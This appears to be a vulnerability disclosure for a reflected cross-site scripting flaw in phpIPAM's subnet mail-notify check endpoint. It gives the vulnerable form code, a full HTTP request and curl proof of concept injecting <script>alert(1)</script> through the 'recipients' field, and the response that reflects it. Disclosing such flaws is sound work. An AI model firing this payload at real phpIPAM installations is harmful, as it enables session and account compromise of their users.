Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

https://github.com/phpipam/phpipam/blob/master/app/subnets/mail-notify-subnet.php

look in line 94-95 where parameter "recipients" not validation, and i exploit xss with payload <script>alert(1)</script>

91 <tr>
92      <th><?php print _('Recipients'); ?></th>
93      <td>
94          <input type="text" class='form-control input-sm pull-left' name="recipients" style="width:400px;margin-right:5px;">
95          <i class="fa fa-info input-append" rel="tooltip" data-placement="bottom" title="<?php print _('Separate multiple recepients with ,'); ?>"></i>
96      </td>
97  </tr>

//request

POST /phpipam/app/subnets/mail-notify-subnet-check.php HTTP/1.1
Host: 192.168.1.15
Content-Length: 233
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.15
Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id;q=0.8
Cookie: search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50
Connection: close

recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ

//response

HTTP/1.1 200 OK
Date: Thu, 08 Dec 2022 03:42:38 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: phpipam=nud7ajr1q60hh5vldp4n619m50; expires=Fri, 09 Dec 2022 03:42:38 +0000; Max-Age=86400; path=/; SameSite=Lax; HttpOnly;
Vary: Accept-Encoding
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<div class='alert alert-danger'>Invalid email address - <script>alert(1)</script></div>

//POC in CURL

curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 233' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50' \
    --data-binary $'recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ' \
    $'http://192.168.1.15/phpipam/app/subnets/mail-notify-subnet-check.php'

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.